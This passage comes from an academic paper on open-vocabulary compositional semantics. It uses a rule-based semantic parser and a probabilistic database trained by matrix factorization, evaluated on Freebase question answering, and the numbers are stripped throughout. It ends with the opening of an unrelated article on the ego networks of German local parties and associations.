are generated for verb-preposition combinations. entity mentions are mapped to the mentioned entity in the logical form. we also created special rules for analyzing conjunctions, appositives, and relativizing conjunc- tions. the complete list of rules used to produce these logical forms is available online. we made several notable choices in designing this component. first, multi-argument verbs are ana- lyzed using pairwise relations, as in the third exam- ple in figure . this analysis allows us to avoid rea- soning about entity triples (quadruples, etc.), which are challenging for the matrix factorization due to sparsity. second, noun-preposition combinations are analyzed as a category and relation, as in the first example in figure . we empirically found that combining the noun and preposition in such http://rtw.ml.cmu.edu/tacl _csf instances resulted in worse performance, as it dra- matically increased the sparsity of training instances for the combined relations. third, entity mentions with the n/n category are analyzed using a spe- cial noun-noun relation, as in the second example in figure . our intuition is that this relation shares instances with other relations (e.g., “city in texas” implies “texan city”). finally, we lowercased each word to create its predicate name, but performed no lemmatization or other normalization. . discussion the scope of our semantic analysis system is some- what limited relative to other similar systems (bos, ; lewis and steedman, ) as it only out- puts existentially-quantified conjunctions of predi- cates. our goal in building this system was to an- alyze noun phrases and simple sentences, for which this representation generally suffices. the reason for this focus is twofold. first, this subset of language is sufficient to capture much of the language surround- ing freebase entities. second, for various techni- cal reasons, this restricted semantic representation is easier to use (and more informative) for training the probabilistic database (see section . ). note that this system can be straightforwardly ex- tended to model additional linguistic phenomena, such as additional logical operators and generalized quantifiers, by writing additional rules. the seman- tics of logical forms including these operations are well-defined in our model, and the system does not even need to be re-trained to incorporate these addi- tions. probabilistic database the second part of our compositional semantics sys- tem is a probabilistic database. this database rep- resents a distribution over possible worlds, where each world is an assignment of truth values to ev- ery predicate instance. equivalently, the probabilis- tic database can be viewed as a distribution over databases or knowledge bases. formally, a probabilistic database is a collection of random variables, each of which represents the truth value of a single predicate instance. given en- tities e ∈ e, categories c ∈ c, and relations r ∈ r the probabilistic database contains boolean random variables c(e) and r(e ,e ) for each category and relation instance, respectively. all of these ran- dom variables are assumed to be independent. let a world w represent an assignment of truth values to all of these random variables, where c(e) = wc,e and r(e ,e ) = wr,e ,e . by independence, the probabil- ity of a world can be written as: p(w) = ∏ e∈e ∏ c∈c p(c(e) = wc,e)× ∏ e ∈e ∏ e ∈e ∏ r∈r p(r(e ,e ) = wr,e ,e ) the next section discusses how probabilistic ma- trix factorization is used to model the probabilities of these predicate instances. . matrix factorization model the probabilistic matrix factorization model treats the truth of each predicate instance as an indepen- dent boolean random variable that is true with prob- ability: p(c(e) = true) = σ(θtc φe) p(r(e ,e ) = true) = σ(θ t r φ(e ,e )) above, σ(x) = e x +ex is the logistic function. in these equations, θc and θr represent k-dimensional vectors of per-predicate parameters, while φe and φ(e ,e ) represent k-dimensional vector embeddings of each entity and entity pair. this model contains a low-dimensional embedding of each predicate and entity such that each predicate’s denotation has a high probability of containing entities with nearby vectors. the probability that each variable is false is simply minus the probability that it is true. this model can be viewed as matrix factorization, as depicted in figure . the category and relation instance probabilities can be arranged in a pair of matrices of dimension |e| × |c| and |e| × |r|. each row of these matrices represents an entity or entity pair, each column represents a category or re- lation, and each value is between and and rep- resents a truth probability (figure , bottom right). these two matrices are factored into matrices of size |e|×k and k ×|c|, and |e| ×k and k ×|r|, re- spectively, containing k-dimensional embeddings of each entity, category, entity pair and relation (figure , bottom left). these low-dimensional embeddings are represented by the parameters φ and θ. inference: computing marginal probabilities inference computes the marginal probability, over all possible worlds, that each entity is an element of a text’s denotation. in many cases – depending on the text – these marginal probabilities can be com- puted exactly in polynomial time. the inference problem is to calculate p(e ∈ γ|s) for each entity e. because both the semantic parser p(`|s) and query evaluation p(γ|`,w) are deter- ministic, this problem can be rewritten as: p(e ∈ γ|s) = ∑ γ (e ∈ γ)p(γ|s) = ∑ w (e ∈ j`kw)p(w) above, ` represents the logical form for the text s produced by the rule-based semantic parser, and represents the indicator function. the notation j`kw represents denotation produced by (determin- istically) evaluating the logical form ` on world w. this inference problem corresponds to query eval- uation in a probabilistic database, which is #p-hard in general. intuitively, this problem can be difficult because p(γ|s) is a joint distribution over sets of en- tities that can be exponentially large in the number of entities. however, a large subset of probabilistic database queries, known as safe queries, permit polynomial time evaluation (dalvi and suciu, ). safe queries can be evaluated extensionally using a prob- abilistic notion of a denotation that treats each entity as independent. let j`kp denote a probabilistic de- notation, which is a function from entities (or entity pairs) to probabilities, i.e., j`kp (e) ∈ [ , ]. the denotation of a logical form is then computed re- cursively, in the same manner as a non-probabilistic denotation, using probabilistic extensions of the typ- ical rules, such as: jckp (e) = ∑ w p(w) (wc,e) jrkp (e ,e ) = ∑ w p(w) (wr,e ,e ) jc (x)∧ c (x)kp (e) = jc kp (e)× jc kp (e) j∃y.r(x,y)kp (e) = − ∏ y∈e ( − jrkp (e,y)) the first two rules are base cases that simply re- trieve predicate probabilities from the probabilistic database. the remaining rules compute the prob- abilistic denotation of a logical form from the de- notations of its parts. the formula for the prob- abilistic computation on the right of each of these rules is a straightforward consequence of the (as- sumed) independence of entities. for example, the last rule computes the probability of an or of a set of independent random variables (indexed by y) us- ing the identity a ∨ b = ¬(¬a ∧¬b). for safe queries, j`kp (e) = p(e ∈ γ|s), that is, the proba- bilistic denotation computed according to the above rules is equal to the marginal probability distribu- tion. in practice, all of the queries in the experi- ments are safe, because they contain only one query variable and do not contain repeated predicates. for more information on query evaluation in probabilis- tic databases, we refer the reader to suciu et al. ( ). note that inference does not compute the most probable denotation, maxγ p(γ|s). in some sense, the most probable denotation is the correct output for a model-theoretic semantics. however, it is highly sensitive to the probabilities in the database, and in many cases it is empty (because a conjunction of independent boolean random variables is unlikely to be true). producing a ranked list of entities is also useful for evaluation purposes. training the training problem in our approach is to learn pa- rameters θ and φ for the probabilistic database. we consider two different objective functions for learn- ing these parameters that use slightly different forms of training data. in both cases, training has two phases. first, we generate training data, in the form of observed assertions or query-answer pairs, by ap- plying the rule-based semantic parser to a corpus of entity-linked web text. second, we optimize the parameters of the probabilistic database to rank ob- served assertions or answers above unobserved as- sertions or answers. this listing of rules is partial as it does not include, e.g., negation or joins between one-argument and two-argument log- ical forms. however, the corresponding rules are easy to derive. . training data training data is generated by applying the process illustrated in figure to each sentence in an entity- linked web corpus. first, we apply our rule-based semantic parser to the sentence to produce a logi- cal form. next, we extract portions of this logical form where every variable is bound to a particu- lar freebase entity, resulting in a simplified logical form. because the logical forms are existentially- quantified conjunctions of predicates, this step sim- ply discards any conjuncts in the logical form con- taining a variable that is not bound to a freebase entity. from this simplified logical form, we gen- erate two types of training data: ( ) predicate in- stances, and ( ) queries with known answers (see figure ). in both cases, the corpus consists entirely of assumed-to-be-true statements, making obtaining negative examples a major challenge for training. . predicate ranking objective riedel et al. ( ) introduced a ranking objective to work around the lack of negative examples in a sim- ilar matrix factorization problem. their objective is a modified version of bayesian personalized rank- ing (rendle et al., ) that aims to rank observed predicate instances above unobserved instances. this objective function uses observed predicate instances (figure , bottom left) as training data. this data consists of two collections, {(ci,ei)}ni= and {(rj, tj)}mj= , of observed category and relation instances. we use tj to denote a tuple of entities, tj = (ej, ,ej, ), to simplify notation. the predicate ranking objective is: op (θ,φ) = n∑ i= log σ(θtci(φei −φe′i)) + m∑ j= log σ(θtrj (φtj −φt′j )) where e′i is a randomly sampled entity such that (ci,e ′ i) does not occur in the training data. simi- larly, t′j is a random entity tuple such that (rj, t ′ j) does not occur. maximizing this function attempts a seemingly simple solution to this problem is to randomly generate negative examples; however, we empirically found that this approach performs considerably worse than both of the pro- posed ranking objectives. original sentence and logical form general powell, appearing sunday on cnn ’s late edition, said ... ∃w,x,y,z. w = /en/powell ∧ general(w) ∧ appearing(w,x) ∧ sunday(x) ∧ appearing on(w,y) ∧y = /en/late ∧ ’s(z,y)∧z = /en/cnn ∧ said(w,...) simplified logical form ∃w,y,z. w = /en/powell ∧ general(w)∧ appearing on(w,y)∧y = /en/late ∧ ’s(z,y)∧z = /en/cnn instances queries answers general(/en/powell) λw.general(w)∧ appearing on(w, /en/late) /en/powell appearing on(/en/powell, /en/late) λy.appearing on(/en/powell,y)∧ ’s(/en/cnn,y) /en/late ’s(/en/cnn, /en/late) λz.’s(z, /en/late) /en/cnn figure : illustration of training data generation applied to a single sentence. we generate two types of train- ing data, predicate instances and queries with observed answers, by semantically parsing the sentence and extracting portions of the generated logical form with observed entity arguments. the predicate instances are extracted from the conjuncts in the simplified logical form, and the queries are created by removing a single entity from the simplified logical form. to find θci , φei and φe′i such that p(ci(ei)) is larger than p(ci(e′i)) (and similarly for relations). during training, e′i and t ′ j are resampled on each pass over the data set according to each entity or tuple’s em- pirical frequency. . query ranking objective the previous objective aims to rank the entities within each predicate well. however, such within- predicate rankings are insufficient to produce correct answers for queries containing multiple predicates – the scores for each predicate must further be cali- brated to work well with each other given the inde- pendence assumptions of the probabilistic database. we introduce a new training objective that encour- ages good rankings for entire queries instead of sin- gle predicates. the data for this objective consists of tuples, {(`i,ei)}ni= , of a query `i with an ob- served answer ei (figure , bottom right). each `i is a function with exactly one entity argument, and `i(e) is a conjunction of predicate instances. for ex- ample, the last query in figure is a function of one argument z, and `(e) is a single predicate instance, ’s(e, /en/late). the new objective aims to rank the observed entity answer above unobserved enti- ties for each query: oq(θ,φ) = n∑ i= log prank(`i,ei,e ′ i) prank generalizes the approximate ranking prob- ability defined by the predicate ranking objec- tive to more general queries. the expression σ(θtc (φe − φe′)) in the predicate ranking objective can be viewed as an approximation of the prob- ability that e is ranked above e′ in category c. prank uses this approximation for each individual predicate in the query. for example, given the query ` = λx.c(x) ∧ r(x,y) and entities (e,e′), prank(`,e,e ′) = σ(θc(φe − φe′)) × σ(θr(φ(e,y) − φ(e′,y))). for this objective, we sample e ′ i such that (`i,e ′ i) does not occur in the training data. when `’s body consists of a conjunction of pred- icates, the query ranking objective simplifies con- siderably. in this case, ` can be described as three sets of one-argument functions: categories c(`) = {λx.c(x)}, left arguments of relations rl(`) = {λx.r(x,y)}, and right arguments of re- lations rr(`) = {λx.r(y,x)}. furthermore, prank is a product so we can distribute the log: oq(θ,φ) = n∑ i= ∑ λx.c(x)∈c(`i) log σ(θc(φei −φe′i)) + ∑ λx.r(x,y)∈rl(`i) log σ(θr(φ(ei,y) −φ(e′i,y))) + ∑ λx.r(y,x)∈rr(`i) log σ(θr(φ(y,ei) −φ(y,e′i))) this simplification reveals that the main differ- ence between oq and op is the sampling of the unobserved entities e′ and tuples t′. op samples them in an unconstrained fashion from their empir- ical distributions for every predicate. oq considers the larger context in which each predicate occurs, with two major effects. first, more negative exam- ples are generated for categories because the logical forms ` are more specific. for example, both “pres- ident of sprint” and “president of the us” generate instances of the president predicate; oq will use entities that only occur with one of these as negative examples for the other. second, the relation param- eters are trained to rank tuples with a shared argu- ment, as opposed to tuples in general. note that, although prank generalizes to more complex logical forms than existentially-quantified conjunctions, training with these logical forms is more difficult because prank is no longer a product. in these cases, it becomes necessary to perform in- ference within the gradient computation, which can be expensive. the restriction to conjunctions makes inference trivial, enabling the factorization above. evaluation we evaluate our approach to compositional seman- tics on a question answering task. each test exam- ple is a (compositional) natural language question whose answer is a set of freebase entities. we com- pare our open domain approach to several baselines based on prior work, as well as a human-annotated freebase query for each example. . data we used clueweb web corpus with the corre- sponding google facc entity linking (gabrilovich et al., ) to create the training and test data for our experiments. the training data is derived from million webpages, and contains . m predicate in- stances, . m queries, k entities and k entity pairs. predicates that appeared fewer than times in the training data were replaced with the predicate unk, resulting in k categories and . k relations. our test data consists of fill-in-the-blank natu- ral language questions such as “incan emperor ” or “cunningham directed auchtre’s second music video .” these questions were created by apply- ing the training data generation process (section . ) to a collection of held-out webpages. each natural language question has a corresponding logical form http://www.lemurproject.org/clueweb . php # of questions avg. # of predicates / query . avg. # of categories / query . avg. # of relations / query . avg. # of answers / query . # of questions with ≥ answer (found by at least one system) table : statistics of the test data set. query containing at least one category and relation. we chose not to use existing data sets for seman- tic parsing into freebase as our goal is to model the semantics of language that cannot necessarily be modelled using the freebase schema. existing data sets, such as free (cai and yates, ) and we- bquestions (berant et al., ), would not allow us to evaluate performance on this subset of language. consequently, we evaluate our system on a new data set with unconstrained language. however, we do compare our approach against manually-annotated freebase queries on our new data set (section . ). all of the data for our experiments is available at http://rtw.ml.cmu.edu/tacl _csf. . methodology our evaluation methodology is inspired by infor- mation retrieval evaluations (manning et al., ). each system predicts a ranked list of answers for each test question. we then pool the top an- swers of each system and manually judge their cor- rectness. the correct answers from the pool are then used to evaluate the precision and recall of each sys- tem. in particular, we compute average precision (ap) for each question and report the mean average precision (map) across all questions. we also re- port a weighted version of map, where each ques- tion’s ap is weighted by its number of annotated correct answers. average precision is computed as m ∑m k= prec(k) × correct(k), where prec(k) is the precision at rank k, correct(k) is an indicator function for whether the kth answer is correct, and m is the number of returned answers (at most ). statistics of the annotated test set are shown in table . a consequence of our unconstrained data generation approach is that some test questions are difficult to answer: of the queries, at least one system was able to produce a correct answer for . the remaining questions are mostly unanswerable map weighted map clustering . . corpuslookup . . factorization (op ) . . factorization (oq) . . ensemble (op ) . . ensemble (oq) . . upper bound . . table : mean average precision for our question answering task. the difference in map between each pair of adjacent models is statistically signifi- cant (p < . ) via the sign test. because they reference rare entities unseen in the training data. . models and baselines we implemented two baseline models based on ex- isting techniques. the corpuslookup baseline answers test questions by directly using the predi- cate instances in the training data as its knowledge base. for example, given the query λx.ceo(x) ∧ of(x, /en/sprint), this model will return the set of entities e such that ceo(e) and of(e, /en/sprint) both appear in the training data. all answers found in this fashion are assigned probability . the clustering baseline first clusters the pred- icates in the training corpus, then answers ques- tions using the clustered predicates. the clustering aggregates predicates with similar denotations, ide- ally identifying synonyms to smooth over sparsity in the training data. our approach is closely based on lewis and steedman ( ), though is also con- ceptually related to approaches such as dirt (lin and pantel, ) and usp (poon and domingos, ). we use the chinese whispers clustering al- gorithm (biemann, ) and calculate the similar- ity between predicates as the cosine similarity of their tf-idf weighted entity count vectors. the de- notation of each cluster is the union of the denota- tions of the clustered predicates, and each entity in the denotation is assigned probability . we also trained two probabilistic database mod- els, factorization (op ) and factorization (oq), using the two objective functions described in sections . and . , respectively. we optimized both objectives by performing passes over the recall p re ci si on ens. (oq) ens. (op ) fact. (oq) fact. (op ) c.lookup clustering . . . . . . . . . . . . . b b b b b b b b b b b + + + + + + + + + + + r r r r r r r r r r r u u u u u u u u u u u b b b b b b b b b b b + + + + + + + + + + + figure : averaged -point precision/recall curves for the answerable test questions. training data with adagrad (duchi et al., ) us- ing an l regularization parameter of λ = − . the predicate and entity embeddings have di- mensions. these parameters were selected on the basis of preliminary experiments with a small vali- dation set. finally, we observed that corpuslookup has high precision but low recall, while both matrix fac- torization models have high recall with somewhat lower precision. this observation suggested that an ensemble of corpuslookup and factoriza- tion could outperform either model individually. we created two ensembles, ensemble (op ) and ensemble (oq), by calculating the probability of each predicate as a / mixture of each model’s predicted probability. . results table shows the results of our map evaluation, and figure shows a precision/recall curve for each model. the map numbers are somewhat low be- cause almost half of the test questions have no cor- rect answers and all models get an average preci- sion of on these questions. the upper bound on map is the fraction of questions with at least correct answer. note that the models perform well on the answerable questions, as reflected by the ra- tio of the achieved map to the upper bound. the weighted map metric also corrects for these unan- swerable questions, as they are assigned weight in the weighted average. these results demonstrate several findings. first, we find that both factorization models outper- form the baselines in both map and weighted map. # of questions w/ an annotated mql query query returns > answer query returns no answers # of questions w/o an mql query table : statistics of the freebase mql queries an- notated for the test data set. the performance improvement seems to be most significant in the high recall regime (right side of figure ). second, we find that the query ranking objective oq improves performance over the predi- cate ranking objective op by - % on the answer- able queries. the precision/recall curves show that this improvement is concentrated in the low recall regime. finally, the ensemble models are consider- ably better than their component models; however, even in the ensembled models, we find that oq out- performs op by a few percent. . comparison to semantic parsing to freebase a natural question is whether our open vocabu- lary approach outperforms a closed approach for the same problem, such as semantic parsing to freebase (e.g., reddy et al. ( )). in order to answer this question, we compared our best performing model to a manually-annotated freebase query for each test question. this comparison allows us to understand the relative advantages of open and closed predicate vocabularies. the first author manually annotated a freebase mql query for each natural language question in the test data set. this annotation is somewhat sub- jective, as many of the questions can only be inex- actly mapped on to the freebase schema. we used the following guidelines in performing the map- ping: ( ) all relations in the text must be mapped to one or more freebase relations, ( ) all enti- ties mentioned in the text must be included in the query, ( ) adjective modifiers can be ignored and ( ) entities not mentioned in the text may be in- cluded in the query. the fourth condition is nec- essary because many one-place predicates, such as mayor(x), are represented in freebase using a binary relation to a particular entity, such as government office/title(x, /en/mayor). statistics of the annotated queries are shown in map ensemble (oq) . freebase . table : mean average precision of our best per- forming model compared to a manually annotated freebase query for each test question. table . coverage is reasonably high: we were able to annotate a freebase query for questions ( % of the test set). the remaining unannotatable ques- tions are due to missing predicates in freebase, such as a relation defining the emperor of the incan em- pire. of the annotated freebase queries, of them return at least one entity answer. the queries with no answers typically reference uncommon en- tities which have few or no known relation instances in freebase. the annotated queries contain an aver- age of . freebase predicates. we compared our best performing model, en- semble (oq), to the manually annotated freebase queries using the same pooled evaluation methodol- ogy. the set of correct answers contains the correct predictions of ensemble (oq) from the previous evaluation along with all answers from freebase. results from this evaluation are shown in table . in terms of overall map, freebase outperforms our approach by a fair margin. however, this ini- tial impression belies a more complex reality, which is shown in table . this table compares both ap- proaches by their relative performance on each test question. on approximately one-third of the ques- tions, freebase has a higher ap than our approach. on another third, our approach has a higher ap than freebase. on the final third, both approaches per- form equally well – these are typically questions where neither approach returns any correct answers ( of the ). freebase outperforms in the over- all map evaluation because it tends to return more correct answers to each question. note that the annotated freebase queries have several advantages in this evaluation. first, freebase contains significantly more predicate instances than our training data, which allows it to produce more complete answers. second, the freebase queries the numbers in this table are not comparable to the num- bers in table as the correct answers for each question are dif- ferent. # of queries freebase higher ap ( %) equal ap ( %) ensemble (oq) higher ap ( %) table : question-by-question comparison of model performance. each test question is placed into one of the three buckets above, depending on whether freebase or ensemble (oq) achieves a better av- erage precision (ap) for the question. correspond to the performance of a perfect semantic parser, while current semantic parsers achieve accu- racies around % (berant and liang, ). the results from this experiment suggest that closed and open predicate vocabularies are comple- mentary. freebase produces high quality answers when it covers a question. however, many of the re- maining questions can be answered correctly using an open vocabulary approach like ours. this evalu- ation also suggests that recall is a limiting factor of our approach; in the future, recall can be improved by using a larger corpus or including freebase in- stances during training. related work open predicate vocabularies there has been considerable work on generating semantic representations with an open predicate vo- cabulary. much of the work is non-compositional, focusing on identifying similar predicates and enti- ties. dirt (lin and pantel, ), resolver (yates and etzioni, ) and other systems (yao et al., ) cluster synonymous expressions in a corpus of relation triples. matrix factorization is an alter- native approach to clustering that has been used for relation extraction (riedel et al., ; yao et al., ) and finding analogies (turney, ; speer et al., ). all of this work is closely related to dis- tributional semantics, which uses distributional in- formation to identify semantically similar words and phrases (turney and pantel, ; griffiths et al., ). some work has considered the problem of com- positional semantics with an open predicate vocab- ulary. unsupervised semantic parsing (poon and domingos, ; titov and klementiev, ) is a clustering-based approach that incorporates com- position using a generative model for each sentence that factors according to its parse tree. lewis and steedman ( ) also present a clustering-based ap- proach that uses ccg to perform semantic compo- sition. this approach is similar to ours, except that we use matrix factorization and freebase entities. finally, some work has focused on the problem of textual inference within this paradigm. fader et al. ( ) present a question answering system that learns to paraphrase a question so that it can be an- swered using a corpus of open ie triples (fader et al., ). distributional similarity has also been used to learn weighted logical inference rules that can be used for recognizing textual entailment or identifying semantically similar text (garrette et al., ; garrette et al., ; beltagy et al., ). this line of work focuses on performing inference between texts, whereas our work computes a text’s denotation. a significant difference between our work and most of the related work above is that our work computes denotations containing freebase entities. using these entities has two advantages: ( ) it en- ables us to use entity linking to disambiguate textual mentions, and ( ) it facilitates a comparison against alternative approaches that rely on a closed predi- cate vocabulary. disambiguating textual mentions is a major challenge for previous approaches, so an entity-linked corpus is a much cleaner source of data. however, our approach could also work with automatically constructed entities, for example, cre- ated by clustering mentions in an unsupervised fash- ion (singh et al., ). semantic parsing several semantic parsers have been developed for freebase (cai and yates, ; kwiatkowski et al., ; berant et al., ; berant and liang, ). our approach is most similar to that of reddy et al. ( ), which uses fixed syntactic parses of unla- beled text to train a freebase semantic parser. like our approach, this system automatically-generates query/answer pairs for training. however, this sys- tem, like all freebase semantic parsers, uses a closed predicate vocabulary consisting of only freebase predicates. in contrast, our approach uses an open predicate vocabulary and can learn denotations for words whose semantics cannot be represented using freebase predicates. consequently, our approach can answer many questions that these freebase se- mantic parsers cannot (see section . ). the rule-based semantic parser used in this pa- per is very similar to several other rule-based sys- tems that produce logical forms from syntactic ccg parses (bos, ; lewis and steedman, ). we developed our own system in order to have control over the particulars of the analysis; however, our ap- proach is compatible with these systems as well. probabilistic databases our system assigns a model-theoretic semantics to statements in natural language (dowty et al., ) using a learned distribution over possible worlds. this distribution is concisely represented in a probabilistic database, which can be viewed as a simple markov logic network (richardson and domingos, ) where all of the random vari- ables are independent. this independence simplifies query evaluation: probabilistic databases permit ef- ficient exact inference for safe queries (suciu et al., ), and approximate inference for the remain- der (gatterbauer et al., ; gatterbauer and suciu, ). discussion this paper presents an approach for compositional semantics with an open predicate vocabulary. our approach defines a probabilistic model over deno- tations (sets of freebase entities) conditioned on an input text. the model has two components: a rule- based semantic parser that produces a logical form for the text, and a probabilistic database that defines a distribution over denotations for each predicate. a training phase learns the probabilistic database by applying probabilistic matrix factorization with a query/answer ranking objective to logical forms de- rived from a large, entity-linked web corpus. an ex- perimental analysis demonstrates that this approach outperforms several baselines and can answer many questions that cannot be answered by semantic pars- ing into freebase. our approach learns a model-theoretic semantics for natural language text tied to freebase, as do some semantic parsers, except with an open predi- cate vocabulary. this difference influences several other aspects of the system’s design. first, because no knowledge base with the necessary knowledge exists, the system is forced to learn its knowledge base (in the form of a probabilistic database). sec- ond, the system can directly map syntactic ccg parses to logical forms, as it is no longer neces- sary to map words to a closed vocabulary of knowl- edge base predicates. in some sense, our approach is the exact opposite of the typical semantic pars- ing approach: usually, the semantic parser is learned and the knowledge base is fixed; here, the knowl- edge base is learned and the semantic parser is fixed. from a machine learning perspective, train- ing a probabilistic database via matrix factorization is easier than training a semantic parser, as there are no difficult inference problems. however, it remains to be seen whether a learned knowledge base can achieve similar recall as a fixed knowledge base on the subset of language it covers. there are two limitations of this work. the most obvious limitation is the restriction to existentially quantified conjunctions of predicates. this limita- tion is not inherent to the approach, however, and can be removed in future work by using a system like boxer (bos, ) for semantic parsing. a more serious limitation is the restriction to one- and two-argument predicates, which prevents our system from representing events and n-ary relations. con- ceptually, a similar matrix factorization approach could be used to learn embeddings for n-ary entity tuples; however, in practice, the sparsity of these tu- ples makes learning challenging. developing meth- ods for learning n-ary relations is an important prob- lem for future work. a direction for future work is scaling up the size of the training corpus to improve recall. low re- call is the main limitation of our current system as demonstrated by the experimental analysis. both stages of training, the data generation and matrix factorization, can be parallelized using a cluster. all of the relation instances in freebase can also be added to the training corpus. it should be feasible to increase the quantity of training data by a factor of - , for example, to train on all of clueweb. scaling up the training data may allow a semantic parser with an open predicate vocabulary to outper- form comparable closed vocabulary systems. acknowledgments this research was supported in part by darpa un- der contract number fa - - - , and by a generous grant from google. we additionally thank matt gardner, ndapa nakashole, amos azaria and the anonymous reviewers for their helpful com- ments. references michele banko, michael j. cafarella, stephen soderland, matt broadhead, and oren etzioni. . open infor- mation extraction from the web. in proceedings of the th international joint conference on artifical intel- ligence. islam beltagy, cuong chau, gemma boleda, dan gar- rette, katrin erk, and raymond mooney. . mon- tague meets markov: deep semantics with probabilis- tic logical form. in second joint conference on lexi- cal and computational semantics (*sem), volume : proceedings of the main conference and the shared task: semantic textual similarity. jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of the nd an- nual meeting of the association for computational linguistics. jonathan berant, andrew chou, roy frostig, and percy liang. . semantic parsing on freebase from question-answer pairs. in proceedings of the conference on empirical methods in natural lan- guage processing. chris biemann. . chinese whispers: an efficient graph clustering algorithm and its application to natu- ral language processing problems. in proceedings of the first workshop on graph based methods for nat- ural language processing. johan bos. . wide-coverage semantic analysis with boxer. in proceedings of the conference on se- mantics in text processing. qingqing cai and alexander yates. . large-scale semantic parsing via schema matching and lexicon extension. in proceedings of the annual meeting of the association for computational linguistics (acl). nilesh dalvi and dan suciu. . efficient query eval- uation on probabilistic databases. the vldb journal, ( ), october. david r. dowty, robert e. wall, and stanley peters. . introduction to montague semantics. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – , july. anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information ex- traction. in proceedings of the conference on empiri- cal methods in natural language processing. anthony fader, luke zettlemoyer, and oren etzioni. . paraphrase-driven learning for open question answering. in proceedings of the st annual meeting of the association for computational linguistics. evgeniy gabrilovich, michael ringgaard, and amar- nag subramanya. . facc : freebase anno- tation of clueweb corpora, version (release date - - , format version , correction level ). http://lemurproject.org/clueweb /. dan garrette, katrin erk, and raymond mooney. . integrating logical representations with probabilistic information using markov logic. in proceedings of the international conference on computational seman- tics. dan garrette, katrin erk, and raymond j. mooney. . a formal approach to linking logical form and vector-space lexical semantics. in harry bunt, johan bos, and stephen pulman, editors, computing mean- ing, volume , pages – . wolfgang gatterbauer and dan suciu. . approx- imate lifted inference with probabilistic databases. proceedings of the vldb endowment, ( ), january. wolfgang gatterbauer, abhay kumar jha, and dan su- ciu. . dissociation and propagation for efficient query evaluation over probabilistic databases. in pro- ceedings of the fourth international vldb workshop on management of uncertain data (mud ) in conjunction with vldb , singapore, september , . thomas l. griffiths, joshua b. tenenbaum, and mark steyvers. . topics in semantic representation. psychological review . julia hockenmaier and mark steedman. . acquir- ing compact lexicalized grammars from a cleaner tree- bank. in proceedings of third international confer- ence on language resources and evaluation. jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning. jayant krishnamurthy and tom m. mitchell. . joint syntactic and semantic parsing with combinatory cat- egorial grammar. in proceedings of the nd annual meeting of the association for computational linguis- tics. tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceedings of the conference on empirical methods in natural language processing. mike lewis and mark steedman. . combined distributional and logical semantics. transactions of the association for computational linguistics, : – . dekang lin and patrick pantel. . dirt — discov- ery of inference rules from text. in proceedings of the seventh acm sigkdd international conference on knowledge discovery and data mining. christopher d. manning, prabhakar raghavan, and hin- rich schütze. . introduction to information re- trieval. cambridge university press, new york, ny, usa. david milne and ian h. witten. . learning to link with wikipedia. in proceedings of the th acm con- ference on information and knowledge management. hoifung poon and pedro domingos. . unsuper- vised semantic parsing. in proceedings of the conference on empirical methods in natural lan- guage processing. lev ratinov, dan roth, doug downey, and mike an- derson. . local and global algorithms for dis- ambiguation to wikipedia. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies. siva reddy, mirella lapata, and mark steedman. . large-scale semantic parsing without question-answer pairs. transactions of the association of computa- tional linguistics – volume , issue . steffen rendle, christoph freudenthaler, zeno gantner, and lars schmidt-thieme. . bpr: bayesian per- sonalized ranking from implicit feedback. in proceed- ings of the twenty-fifth conference on uncertainty in artificial intelligence. matthew richardson and pedro domingos. . markov logic networks. machine learning, ( - ): – , february. sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in joint human language technology conference/annual meeting of the north american chapter of the asso- ciation for computational linguistics. sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . large-scale cross- document coreference using distributed inference and hierarchical models. in association for computa- tional linguistics: human language technologies (acl hlt). robert speer, catherine havasi, and henry lieberman. . analogyspace: reducing the dimensionality of common sense knowledge. in aaai. dan suciu, dan olteanu, christopher ré, and christoph koch. . probabilistic databases. synthesis lec- tures on data management, ( ): – . ivan titov and alexandre klementiev. . a bayesian model for unsupervised semantic parsing. in proceed- ings of the th annual meeting of the association for computational linguistics. peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ), jan- uary. peter d. turney. . the latent relation mapping en- gine: algorithm and experiments. journal of artificial intelligence research, ( ): – , december. mohamed yahya, klaus berberich, shady elbassuoni, maya ramanath, volker tresp, and gerhard weikum. . natural language questions for the web of data. in proceedings of the joint conference on em- pirical methods in natural language processing and computational natural language learning. limin yao, sebastian riedel, and andrew mccallum. . unsupervised relation discovery with sense dis- ambiguation. in proceedings of the th annual meet- ing of the association for computational linguistics: long papers - volume . limin yao, sebastian riedel, and andrew mccallum. . universal schema for entity type prediction. in proceedings of the workshop on automated knowledge base construction. alexander yates and oren etzioni. . unsupervised resolution of objects and relations on the web. in pro- ceedings of the annual conference of the north american chapter of the association for computa- tional linguistics. john m. zelle and raymond j. mooney. . learning to parse database queries using inductive logic pro- gramming. in proceedings of the thirteenth national conference on artificial intelligence. luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in uai ’ , proceedings of the st conference in un- certainty in artificial intelligence. microsoft word - volume _final insna.org | issues & | volume | a visual data collection method: german local parties and associations dr. isabelle borucki (corresponding author) university of trier trier, germany abstract this research captures local networks of german political parties and welfare agencies in re- gards to poverty. the article explores whether there are differences in regards to homophily and brokerage between the two studied groups using a dataset of egonetworks in two ger- man cities. the computer assisted drawn networks were collected in an interactive participa- tive way together with the interviewed egonetworks. to achieve the theoretical aim of analys- ing homophily and brokerage between politicians and welfare workers, two hypotheses are examined, resting upon social capital theory. the hypotheses were quantified and explicated with different variables. the first hypothesis states that heterophile networks imply more so- cial capital, which referred to different measurements (size, density, homophily). this could be partially validated since the analysed networks of association representatives (n= ) were denser and slightly more heterophile than those of party representatives (n= ). second, it was assumed that politicians, because of their function as elected representatives, would be more likely to take on an interface function within the communities than representatives of civil society institutions. results based on calculated ei-indices, subgraphs and brokerage show that party representatives do indeed have larger networks, but these networks split into fewer subgraphs than association representatives’ networks. author isabelle borucki currently is leading “dipart. digital party research” – a junior research group on digital party research, located at the nrw school of governance, university of duisburg-essen. before that she 